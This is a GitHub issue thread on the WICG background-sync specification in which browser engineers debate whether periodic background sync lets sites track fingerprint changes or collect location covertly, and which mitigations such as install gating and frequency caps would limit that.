WICG / background-sync

A design and spec for ServiceWorker-based background synchronization
https://wicg.github.io/background-sync/spec/
Apache License 2.0
640 stars 85 forks source link

Privacy risk: fingerprint updates #168

Open jyasskin opened 4 years ago

jyasskin commented 4 years ago

@ehsan mentioned in https://twitter.com/ehsanakhgari/status/1202982676531159040 that a tracking site might use the periodic execution enabled by a background sync to keep up with gradual fingerprint changes. That is, it's generally easier to build a short-term fingerprint than one that stays stable for a long time. If a user clears a tracking site's cookies, the site wants to have measured a fingerprint as close as possible to the cookie clearing event in order to maximize the chance that the fingerprint is still the same when the user next visits the site. Background Sync events allow the site to re-measure the fingerprint closer to the 'clear' than the last intentional visit to the site.

This is mitigated by several considerations:

  1. If the user clears a single site's cookies, the easiest UI to get there is by actually visiting the site, which allows it to measure a fingerprint just before and just after the clear, with no need to take advantage of a background sync. So let's assume the user is clearing the whole browser's cookies.
  2. Some discussion of location tracking mitigations has suggested that periodic syncs might be discarded after the user hasn't engaged with the site for a certain amount of time. I don't see this mentioned in the spec, but it would also decrease the effectiveness of fingerprint updates.
  3. As we work to reduce fingerprintability in general, it may be more feasible to remove access to a fingerprinting vector within a background sync than it would be across the whole web platform. The spec should suggest doing this.
ehsan commented 4 years ago

Hmm, I believe this issue is misrepresenting the actual attack that I had in mind. This isn't about users clearing cookies at all (which is an activity that the majority of browser users probably never engage in, even though a subset of users may do so regularly). It is however about fingerprint evolution as a result of software updates. That applies to all browser users alike. This mean that mitigation 1 mentioned above isn't necessarily going to address this issue.

3. As we work to reduce fingerprintability in general, it may be more feasible to remove access to a fingerprinting vector within a background sync than it would be across the whole web platform. The spec should suggest doing this.

And the flip side of it is also that as browsers keep exposing more APIs to service workers, the practical chances of this keeps going down.

jyasskin commented 4 years ago

It's possible I'm misunderstanding the goal of fingerprinting here. The FP-STALKER paper you linked says "websites use browser fingerprinting as a way to regenerate deleted cookies", which is the primary use I imagined in the OP. And, of course, in a first-party context with a consistent cookie, there's no point in using fingerprinting to identify the user--you just use the cookie.

But sites might also record a first-party fingerprint in order to match it against a fingerprint they can measure in a third-party context, which is more important as we move to partitioned cookie stores. In that case, I think we'd want to look at how those third-party contexts can link fingerprints as they evolve and whether adding a periodic first-party sync improves that linkability. Background Sync would cause the largest problem if the average fingerprint evolution between uses of the site in any context is too big to link, but the site is used in a first-party context enough to refresh the BG Sync timeout from (2) so that the last BG sync gets enough closer to the next third-party use that it can link fingerprints again. (Sorry, that was probably confusing.)

Re (3), it's true that as we expose more APIs to service workers, they're likely to become as good at fingerprinting as foreground tabs. I was imagining that we might restrict the APIs available within the periodicsync event to a subset of everything available to service workers in general.

ehsan commented 4 years ago

It's possible I'm misunderstanding the goal of fingerprinting here. The FP-STALKER paper you linked says "websites use browser fingerprinting as a way to regenerate deleted cookies", which is the primary use I imagined in the OP.

Yes, that paper is written assuming that the use case of fingerprint evolution is to handle cookie resurrection. I linked to it because it had investigated the concept and its relationship with updates, in the hopes that it would help clarify my point.

And, of course, in a first-party context with a consistent cookie, there's no point in using fingerprinting to identify the user--you just use the cookie.

There are many other possibilities, for example if you're looking to identify for example the user's device (not their browser), so that you can identify their traffic from other browsers/apps on the same device possibly not sharing the same cookie store. Or if you're a surveillance actor who has switched to using first-party cookies for cross-site tracking instead of third-party cookies, and you need a fingerprint in order to join the first-party cookies together. And so on.

But sites might also record a first-party fingerprint in order to match it against a fingerprint they can measure in a third-party context, which is more important as we move to partitioned cookie stores.

Yes, that is another case as well (a special case of the general issue I mentioned above which is a prevalent problem on the Web today; no need to wait for more browsers to move to partitioned cookie stores.)

michaelkleber commented 4 years ago

The threat of noticing a gradual change over time does seem quite relevant to any effort to combat fingerprinting. Sites that a user visits frequently have more of a chance to notice this than sites the user visits only rarely, and from that point of view, Background Sync is a privilege escalation.

I see the explainer already says "Syncing may be less frequent depending on heuristics such as visit frequency & device status", and the draft spec says "The user agent SHOULD limit tracking by capping the number of retries and duration of sync events." There's also a blink-dev discussion about this point of view here.

Those seem like the sorts of mitigations that would cap the privilege escalation. Ehsan, would making those suggestions concrete address the concern, or is there another angle you're after?

ehsan commented 4 years ago

The threat of noticing a gradual change over time does seem quite relevant to any effort to combat fingerprinting. Sites that a user visits frequently have more of a chance to notice this than sites the user visits only rarely, and from that point of view, Background Sync is a privilege escalation.

It took me a while to see how you're considering this a privilege escalation, I think I may see it. I think the assumption is that the user visits the app frequently, then the app gets installed, and then it gets to use background sync. Then as the user keeps using the app more (in the installed context) it will become able to run more and more code in the background invisibly.

But I was under the impression that Chrome allows apps to get installed even after the first time that the user visits them based on some heuristics that determine whether they can be displayed offline? That's at least what happens on my device, I can install apps on first visit. Would such apps running code in the background also count as privilege escalation in your opinion?

I see the explainer already says "Syncing may be less frequent depending on heuristics such as visit frequency & device status", and the draft spec says "The user agent SHOULD limit tracking by capping the number of retries and duration of sync events." There's also a blink-dev discussion about this point of view here.

The blink-dev link seems to be broken unfortunately. I have seen that part in the spec and the explainer. I can't really understand what they mean concretely and it seems that even following that you can still be in a situations where user data is reported to invisible third-parties.

Those seem like the sorts of mitigations that would cap the privilege escalation. Ehsan, would making those suggestions concrete address the concern, or is there another angle you're after?

I'm not after any angles here. I'll allow @jyasskin to decide what he wants to keep track of in his issue.

michaelkleber commented 4 years ago

Sorry, proper blink-dev link.

I don't know the heuristics for either installation or BackgroundSync frequency. They certainly seem relevant to this discussion, and like something that could be adjusted to mitigate risk, so I hope someone knowledgeable will chime in. My hope was that in your example (apps that get "installed even after the first time that the user visits them") they would only get to use BS a handful of times before being cut off. Similarly, letting a site you visit every day perform BS every few hours seems plausibly reasonable.

ehsan commented 4 years ago

I don't know the heuristics for either installation or BackgroundSync frequency.

It seems that this document explains the privacy considerations Chrome has taken with this API. I quote from that document:

"An important threat vector is that the user may desire background sync on one network... but not on another... Unfortunately, we can't do this here, as the product need is to do exactly the opposite."

"So instead, we agreed to additionally gate this functionality on installation, i.e. only allow it for PWAs. Installation should imply persistence of some sorts, in this case the ability to continue syncing in the background, which we still don't want to expose to drive-by web."

(Note here how persistence of the bytes of the installed app is used as a justification for allowing persistent network access, using the word "persistence" in two different contexts with two different meanings).

"Further mitigations have been taken, such as capping the frequency to 2 syncs a day, and observing the site engagement to only maintain registrations for websites the user is actually using."

"Per our (product/permissions/privacy/security) agreement, these mitigations are sufficient; although I still feel that the connection between installed-ness and persistence is not yet sufficiently clear to the user, and we'll need to find ways to improve that in the future."

"Lastly, we have concluded that TWAs may always use periodic background sync (by definition, they're installed; and they don't need to follow the Chrome background sync permission), as the Java part of the app could use such functionality already."

So the gist is that depending on how you get installed, you may have some restrictions applied to you: if you get installed on first visit or later, you get to run two background sync events per day while the user keeps using your app. If you get installed before the first visit (through the play store) you get no restrictions applied to you.

Similarly, letting a site you visit every day perform BS every few hours seems plausibly reasonable.

I disagree. One example to demonstrate that this isn't reasonable: user installs a popular weather app. They open it once or twice a day to check the weather. The weather app uses background sync to covertly run in the background and run at times that the user is unlikely to use their device (e.g. at night time when they're asleep). The background pings phone home with location data with a lot of users and try to correlate the data together to find out which users cohabit the same home. And finally, a data breach some time later exposes the extracted information to the public over the Internet.

michaelkleber commented 4 years ago

I think your weather app example is a great one to dig into.

I go to some weather site every day. I go through an install flow, so it's on the home screen of my phone. I give it location permission, because of course weather depends on knowing location.

One way it could use the Background Sync capability is to download the weather just before I typically open the app, so all the info is right there waiting for me. That seems like exactly what I would want an installed weather app to do. I have news and weather apps on my phone that I look at every morning, they behave that way, and it's great UX.

Another way it could use the Background Sync capability, as you point out, is to run in the background, sometime when I'm not about to open it, request my location, and learn where I spend my time. That means that when I look at the weather every morning, it can tell me what weather to expect for where I just woke up — and also it could tell me about the weather at work, where it's noticed I spend a lot of time. That again feels like just what I would want an app to do, once I had installed it and given it location access.

(You bring up the threat of a later data breach. Sure, maybe I'm worried about that and try to find weather apps whose data retention policy says "We delete your exact locations after a week; beyond that we only retain the general areas you're in frequently, so we can show you the weather there." But that seems beside the point if I'm already willing to grant them permission to see my location.)

So for a user who wants the good weather app experience, what additional signals do you think we should require, beyond the two existing permission grants?